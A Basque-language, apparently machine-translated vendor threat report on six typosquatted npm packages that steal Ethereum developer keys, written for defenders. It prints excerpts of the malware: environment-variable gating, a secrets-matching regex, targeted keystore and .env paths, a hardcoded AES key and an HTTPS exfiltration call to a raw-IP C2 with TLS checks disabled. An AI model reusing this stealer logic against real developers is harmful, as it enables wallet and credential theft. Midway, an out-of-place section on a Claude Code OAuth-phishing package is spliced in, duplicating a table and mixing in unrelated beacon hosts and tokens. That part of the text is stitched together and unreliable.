EVMDeFi npm Typosquatting erasoak garatzaileen giltzak lapurtzen ditu

EVM/DeFi npm Typosquatting erasoak garatzaileen giltzak lapurtzen ditu

TL; DR

2026ko maiatzaren 6an, npm argitaratzaile bakar batek, namikazesarada010206-k sei pakete gaizto bultzatu zituen Ethereum, Solidity eta DeFi garatzaileen ekosistemari zuzenduta.

Paketeak, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, eta web3-utils-core, Web3 tresna ezagunen laguntzaile liburutegien itxura izateko diseinatutako izen sinesgarriak erabili zituen.

Sei pakete guztiek gauza bera zuten telemetry.js fitxategia. Fitxategia byte berdina zen kluster osoan, SHA-256rekin:

SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

Malwarea ez da instalazio garaian exekutatzen. Ez dago preinstall or postinstall kakoa. Horren ordez, paketea inportatzen denean aktibatzen da require().

Xehetasun horrek garrantzia du.

Inplanteak garatzaile batek paketea benetan erabili arte itxaroten du. Ondoren, lan-estazioa benetako Ethereum / Solidity garapen ingurune baten itxura duen egiaztatzen du. Alchemy edo Infura gakoak, gako pribatuak, mnemoteknia, inplementatzaile gakoak edo Foundry direktorio lokal bat bilatzen ditu.

Host-a bat badator, lapurrak SSH gako pribatuak, Foundry / Geth / Brownie zorroaren gako-biltegiak biltzen ditu. .env* fitxategiak eta ingurune-aldagai sentikorrak. Paketea AES-256-GCM-rekin enkriptatzen du pasahitz gogor bat erabiliz eta TLS egiaztapena desgaituta duen IPv4 C2 amaiera-puntu gordin batera kanporatzen du.

Xygeniren Malware Goiztiarraren Abisua (MEW) sistemak sei paketeak gaiztoak direla baieztatu du. npm erregistroaren kentzeko txosten sorta zain dago.

Klusterra: Sei pakete, argitaletxe bat

Argitaratzailearen kontua. namikazesarada010206 egiaztatu gabeko Gmail helbidera lotuta zegoen namikazesarada010206@gmail.com.

Kanpaina egun bakarreko argitalpen-leherketa gisa agertu zen 2026ko maiatzaren 6an. Sei pakete guztiak honela bertsionatu ziren: 1.0.0, ez zuen exekuzio-mendekotasunik, eta hiru fitxategi bakarrik bidali zituen:

package.json index.js telemetry.js

Iturburu-biltegi bera ere deklaratu zuten:

https://github.com/harunosakura030303-maker/evmchain-config

Lehenengo hiru paketeak MEW eskanerrek lehen argitalpenean detektatu zituzten. Gainerako hirurak behartuta markatu ziren argitaratzailearen npm profila analisten berrikuspenaren ondoren. Behin byte berdinak... telemetry.js Klusterrean baieztatu zenez, koherentziaren arabera gaizto gisa itxi ziren.

Package Bertsio npm Argitaratua MEW Txartela Epaia
viem-core 1.0.0 2026-05-06 01:38:44Z # 51049 Kaltegarriak
viem-utils-core 1.0.0 2026-05-06 # 51050 Kaltegarriak
hardhat-core-utils 1.0.0 2026-05-06 # 51051 Kaltegarriak
evm-utils 1.0.0 2026-05-06 # 51069 Gaiztoa, koherentziaz
galdaketa-utilitateak 1.0.0 2026-05-06 # 51071 Gaiztoa, koherentziaz
web3-utilitateak-nukleoa 1.0.0 2026-05-06 # 51070 Gaiztoa, koherentziaz

Izendatzeko estrategia erraza baina eraginkorra da.

Pakete hauek ez dituzte goi-mailako izen zehatzak imitatzen. Horren ordez, "erabilgarritasun" atzizki sinesgarriak erabiltzen dituzte, hala nola -core, -utils, eta -utils-coreHorrek Web3 tresnen ondoan garatzaile batek ikustea espero dezakeen liburutegi osagarrien itxura ematen die.

Pakete gaiztoa Helburu legitimoa
viem-core viem, Ethereum TypeScript bezero ezaguna
viem-utils-core Viem
hardhat-core-utils hardhat, Solidity garapen ingurune nagusi bat
evm-utils EVM tresnen izen-espazio generikoa
galdaketa-utilitateak galdaketa, Solidity tresna-katea
web3-utilitateak-nukleoa web3-utils, Web3.js laguntzaileak

Hau da “pakete osagarriaren” eredua: ez “ni naiz benetako paketea”, baizik eta “benetako paketearen inguruan laguntzaile arrazoizkoa naizela dirudi”.

Azkar mugitzen diren DeFi garatzaileentzat, hori nahikoa da arriskua sortzeko.

Zer gertatzen da paketea inportatzen denean

Eraso-katea txikia, nahita egindakoa eta kriptografia-garapen inguruneetan zentratua da.

Ez dago instalazio-kakorik. Horren ordez, pakete bakoitzak badu index.js stub funtzionalitatea esportatzen duena eta ondoren telemetria modulu gaiztoa kargatzen duena.

require('./telemetry').init();

Horrek esan nahi du malwarea lehenengo inportazioan aktibatzen dela.

Hori eragiketa aldetik erabilgarria da erasotzailearentzat. Eskaner eta sandbox askok instalazio-garaiko portaeran jartzen dute arreta. Pakete honek garatzaile, eraikuntza-skript, proba-multzo edo exekuzio-bide batek erabili arte itxaroten du.

Aktibazio Atea: Benetako Web3 Garatzaileen Lan-estazioetan Bakarrik Piztu

Inplantearen atalik garrantzitsuena aktibazio-atea da.

Malwareak Ethereum / Solidity garatzaileen makinetan ohikoak diren ingurune-aldagaiak egiaztatzen ditu:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

Foundry instalatuta dagoen ala ez ere egiaztatzen du:

fs.existsSync(path.join(os.homedir(), '.foundry'))

Baldintza bat ere ez bada egia, funtzioak balioa itzultzen du eta ez du ezer egiten.

Horrek paketea isilagoa egiten du analisi-ingurune generikoetan. Foundry, Alchemy gako, Infura gako, gako pribatu edo mnemotekniarik gabeko sandbox batek inportazio kaltegabea izan dezake.

Ostalari bat datorrenean, malwareak 60 eta 90 segundo artean itxaroten du bildu aurretik:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

Atzerapenak inportazioaren eta kanporatzearen arteko korrelazio agerikoa murrizten du. .unref() deiak ostalari-prozesuari normal irteteko aukera ere ematen dio paketea script laburreko batean inportatu bada.

Hau ez da zarata handiko apurtu eta hartu portaera bat. Lapurreta zuzendu bat da, garatzaile ingurunea lapurtzea merezi ez badu behintzat exekutatzea saihesteko diseinatua.

Lapurrak biltzen duena

Aktibazio atea igaro ondoren, malwareak Web3 garapenean garrantzitsuenak diren iturrietatik biltzen du informazioa: gako pribatuak, zorro-gakoen biltegiak, inplementazio-kredentzialak, hodeiko sekretuak, npm tokenak eta tokiko proiektuaren konfigurazioa.

Iturria Zer bildu da
prozesua.ingurunea Edozein aldagai bat datorren /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* PRIVATE KEY edo BEGIN OPENSSH dituzten fitxategiak, fitxategiaren eduki osoa barne.
~/.foundry/giltza-dendak/* Foundry zorroaren giltza-biltegi fitxategiak
~/.ethereum/giltza-denda/* Geth zorroaren giltza-biltegi fitxategiak
~/.brownie/kontuak/* Brownie zorroaren giltza-biltegiko fitxategiak
${cwd}/.ingurunea Fitxategiaren eduki osoa
${cwd}/.env.local Fitxategiaren eduki osoa
${cwd}/.env.production Fitxategiaren eduki osoa
${cwd}/.env.development Fitxategiaren eduki osoa
os.hostname() Ostalariaren metadatuak
kripto.ausazko UUID() Biktima/saioaren identifikatzailea
Data.orain() Bilduma denbora-zigilua
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

ATTA tokenak hauek dira:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

Ezin izan dugu baieztatu telemetria operadorearen beraren analisiak ziren ala monetizatutako kanal bereizi bat. ATTA tokenak berdinak dira aztertu ditugun bi laginetan.

B multzoa: heibai

claude.hk OAuth Phishing + ANTHROPIC_BASE_URL Bahiketa

Apirilaren 1eko lagina kanpainaren atal gordinagoa eta goiztiarra da.

heibai:2.1.88-claude.hk-4 argitaratu zuen wuguoqiangvip28, 2025eko ekainaren 7an sortutako kontu bat. Paketeak berariaz bertsionatu zuen bere burua legezko balioen aurka 2.1.88 Askapen antropikoa.

Ez du CA-cert MITM-rekin kezkatzen. Horren ordez, gezurra esaten dio erabiltzaileari OAuth amaiera-puntuaren inguruan.

Claude Code iturriaren gainean dauden gehigarri gaiztoen artean daude:

Iturria Zer bildu da
prozesua.ingurunea Edozein aldagai bat datorren /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* PRIVATE KEY edo BEGIN OPENSSH dituzten fitxategiak, fitxategiaren eduki osoa barne.
~/.foundry/giltza-dendak/* Foundry zorroaren giltza-biltegi fitxategiak
~/.ethereum/giltza-denda/* Geth zorroaren giltza-biltegi fitxategiak
~/.brownie/kontuak/* Brownie zorroaren giltza-biltegiko fitxategiak
${cwd}/.ingurunea Fitxategiaren eduki osoa
${cwd}/.env.local Fitxategiaren eduki osoa
${cwd}/.env.production Fitxategiaren eduki osoa
${cwd}/.env.development Fitxategiaren eduki osoa
os.hostname() Ostalariaren metadatuak
kripto.ausazko UUID() Biktima/saioaren identifikatzailea
Data.orain() Bilduma denbora-zigilua

Helburu zerrenda oso zehatza da. Hau ez da nabigatzaile lapurreta generikoa edo kredentzial scraping zabala. Ethereum aplikazioak eraikitzen, probatzen, zabaltzen edo erabiltzen dituzten garatzaileei zuzenduta dago.

Bereziki garrantzitsua da Foundry, Geth eta Brownie gako-biltegiak sartzea. Fitxategi hauek zorroetarako edo hedapen-identitateetarako sarbide zuzena adieraz dezakete. Erasotzaileak pasahitz, mnemoniko edo ingurune-sekretuekin parekatu baditzake, funtsak mugitu, hedatzaileak ordezkatu edo kontratu adimendunen eragiketak arriskuan jarri ahal izango ditu.

Enkriptazioa kanporatzea baino lehen

Malwareak bildutako datuak bidali aurretik enkriptatzen ditu.

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

Gogor kodetutako pasahitz hau da:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

Azken karga JSON gisa bilduta dago:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

Enkriptazioak ez du malwarea aurreratuago egiten berez. Hala ere, sarearen ikuskapena zailtzen du. Irteera zaintzen duen defendatzaile batek JSON karga ikusiko luke, baina ez lapurtutako giltzak, zorro fitxategiak edo .env edukia pasahitz gogorrik eta deszifratze logikarik gabe.

IPv4 C2 gordinera exfiltratzea

Iragazki-bidea gogor kodetuta dago:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

Malwareak datuak honera bidaltzen ditu:

https://76.13.37.80:8443/api/v1/telemetry

Bi xehetasun nabarmentzen dira.

Lehenik eta behin, C2 IPv4 helbide gordina da, domeinu bat baino gehiago. Horrek domeinua erregistratzeko beharra kentzen du eta domeinuetan oinarritutako detekzio batzuk saihesten ditu.

Bigarrenik, TLS egiaztapena desgaituta dago honekin:

rejectUnauthorized: false

Horri esker, malwareak edozein ziurtagiri onar dezake, auto-sinatutako ziurtagiriak barne. Beste era batera esanda, erasotzaileak garraio enkriptatua lortzen du baliozko ziurtagiri publiko baten beharrik gabe.

Ez dago berriro saiatzeko logikarik eta ez dago ordezko ostalaririk. Erroreak isilean irensten dira. Horrek paketea isilpean mantentzen du C2 lineaz kanpo edo eskuraezina bada.

Zergatik garrantzitsua da kanpaina honek

Garatzaileei zuzendutako npm pakete gaizto gehienek kredentzial zabalak bilatzen dituzte: npm tokenak, AWS giltzak, GitHub tokenak edo .npmrc fitxategiak.

Kanpaina honek helburua murrizten du.

Makina Ethereum edo Solidity garatzaile batena dela adierazten duten zantzuak bilatzen ditu. Ondoren, ingurune horretan garrantzitsuak diren aktiboak ateratzen ditu: zorro-gako-biltegiak, gako pribatuak, mnemoteknia, inplementatzaile-gakoak, .env fitxategiak eta SSH gakoak.

Horrek kanpaina Web3 taldeentzat arriskutsuagoa egiten du npm lapur generiko bat baino.

Infekzio arrakastatsu batek agerian utz dezake:

  • Hedapen-zorroak
  • Kontratu adimendunen administrazio-giltzak
  • RPC hornitzailearen gakoak
  • Hodeiko hedapen-kredentzialak
  • npm argitalpen tokenak
  • SSH sarbidea garatzaile edo eraikitzaile azpiegituretara
  • Proiektuaren sekretuak gordeta .env fitxategiak
  • Foundry, Geth edo Brownie-rentzako zorro-giltza-biltegiak

Paketeen izenek ere ingeniaritza sozial argia erakusten dute. Web3 garatzaileen ekosistemari zuzenduta daude tresna-izen ezagunen bidez: viem, hardhat, foundry, evm, eta web3.

Aktoreak ez du benetako proiektuak arriskuan jarri beharrik. Garatzaile bat besterik ez dute behar itxuraz pakete osagarri arrazoizkoa instalatzeko.

Konpromisoaren eta Detekzioaren Adierazleak

Paketeak eta argitaratzailea
Field Balio
npm argitaratzailea namikazesarada010206
Argitaratzailearen helbide elektronikoa namikazesarada010206@gmail.com
posta elektronikoa egiaztatuta Ez
SCM egiaztatu Ez
Ospe puntuazioa 1.0
Paketeak viem-core, viem-utils-core, hardhat-core-utils, evm-utils, fundry-utils, web3-utils-core
Bertsioak Guztiak 1.0.0
Iturburu-biltegia https://github.com/harunosakura030303-maker/evmchain-config
Gaiztoa baieztatuta Sei pakete guztiak
Sarea
Mota Balio
C2 amaiera-puntua https://76.13.37.80:8443/api/v1/telemetry
C2 IP 76.13.37.80
C2 ataka 8443/tcp
TLS portaera ukatuBaimenik gabe: faltsua
Karga-eskema {"v":2,"iv": "d": ,"t": }
Fitxategiak eta hashak
Mota Balio
telemetria.js SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
Paketearen diseinua package.json, index.js, telemetry.js
Fitxategi kopurua 3
Gutxi gorabeherako tamaina osoa 3.4 KB

Aktibazio seinaleak

Malwareak ingurune-aldagai hauek egiaztatzen ditu:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

Honako hauek ere egiaztatzen ditu:

~/.foundry/

Helburuko ostalarien bideak

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

Bilduma Regex

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

Detekzio Oharrak

Hainbat arauk kanpaina hau harrapatzen dute portaeraren analisi osoa behar izan gabe.

Lehenik eta behin, eskaneatu blokeo-fitxategiak sei pakete-izen gaiztoen bila:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

Edozein partida package-lock.json, yarn.lock, pnpm-lock.yamlEdo node_modules historia gertakari larri gisa hartu behar da.

Bigarrenik, Node.js prozesuak zorroaren gako-biltegiaren bideak irakurtzen dituzten kontrolatu:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

Laguntzaile-mendekotasun gisa inportatutako pakete batentzat gutxitan izaten da portaera zilegi hau. Bereziki susmagarria da sareko irteerako jarduera baten ondoren datorrenean.

Hirugarrenik, blokeatu edo alertatu HTTPS konexioak honako hauei:

76.13.37.80:8443

Batez ere eskaeraren bidea hau denean:

/api/v1/telemetry

Laugarrenik, bilatu ezaugarri hauek konbinatzen dituzten npm paketeak:

  • Argitaletxe berria edo ospe txikikoa
  • Gmail kontu egiaztatu gabea
  • Web3-ren ondoko paketearen izena
  • Ez dago biltegiko historia esanguratsurik
  • Pakete txikien diseinua
  • index.js telemetria edo laguntzaile fitxategi bat kargatzen duena
  • Ez dago exekuzio-mendekotasunik
  • Ingurune-aldagai sentikorren bilduma
  • Diru-zorroaren giltza-biltegirako sarbidea

Eredu hau IOC bakarra baino erabilgarriagoa da, hurrengo paketeak IP helbidea alda baitezake baina helburu-logika bera mantenduz.

Konpromiso Erantzunaren Kontrol-zerrenda

Garatzaile batek sei paketeetako bat erabili badu eta bere ingurunea aktibazio-atearekin bat badator, lan-estazioa arriskuan dagoela esan nahi du.

Horrek barne hartzen ditu Foundry instalatuta duten makinak, inguruneko Alchemy edo Infura gakoak, gako pribatuak, mnemoteknia edo inplementatzaile gakoak.

Gomendatutako erantzuna:

  • Deskonektatu ostalaria saretik.
  • Ganboa node_modules, blokeo-fitxategiak, shell historia eta auzitegi-analisietarako erregistro garrantzitsuak.
  • Biratu SSH gako-pare bakoitza azpian ~/.ssh/.
  • Biratu zorroaren giltzak giltza-biltegi bakoitzaren azpian ~/.foundry, ~/.ethereum, eta ~/.brownie.
  • Mugitu funtsak zorro berrietara.
  • Biratu gordetako sekretu guztiak .env* Garatzaileak lan egin zuen biltegietako fitxategiak.
  • Txandakatu bildumaren erregexarekin bat datozen ingurune-sekretuak, besteak beste, AWS gakoak, npm tokenak, inplementazio-tokenak, API gakoak, gako pribatuak, haziak eta mnemonikoak.
  • Auditatu hodeiaren, npmren, GitHub-en, RPC hornitzailearen eta blockchain-aren jarduera paketea lehen aldiz instalatu zenetik.
  • Berriro erabili aurretik, berriro irudikatu lan-estazioa.

Zer eraman beharko lukete defendatzaileek

Kanpaina honek npm typosquatting-a nola eboluzionatzen ari den erakusten du balio handiko garatzaileen ekosistemen inguruan.

Aktoreak ez zuen iraunkortasunik behar. Ez zuten nahasmendurik behar. Ez zuten instalazio-garaian exekutatzeko beharrik ere.

Horren ordez, hiru gauzetan oinarritu ziren:

  • Web3 pakete izen sinesgarriak
  • Aktibazioa benetako kriptografia-garapen makinetan bakarrik
  • Ethereum garatzaileentzat garrantzitsuenak diren fitxategien eta sekretuen lapurreta zuzena

Horrek kanpaina erraz galtzea egiten du eskaneatze orokorrean eta arriskutsua ingurune egokian erortzen denean.

Web3 taldeentzat, ikasgaia argia da: mendekotasun izenak mehatxu ereduaren parte gisa tratatu. Laguntzaile kaltegabe baten itxura duen pakete bat zorroa arriskuan jartzeko biderik laburrena izan daiteke oraindik ere.

npm erregistroari jakinarazi zaio. Argitaratzaile kontua eta paketeak kentzen direnean mezu hau eguneratuko dugu.

sca-tools-software-konposizio-analisi-tresnak
Lehentasuna eman, konpondu eta babestu zure software arriskuak
Lortu zure doako kontua.
Ez da beharrezkoa kreditu txartelik.

Ziurtatu zure softwarearen garapena eta entrega

Xygeni produktu multzoarekin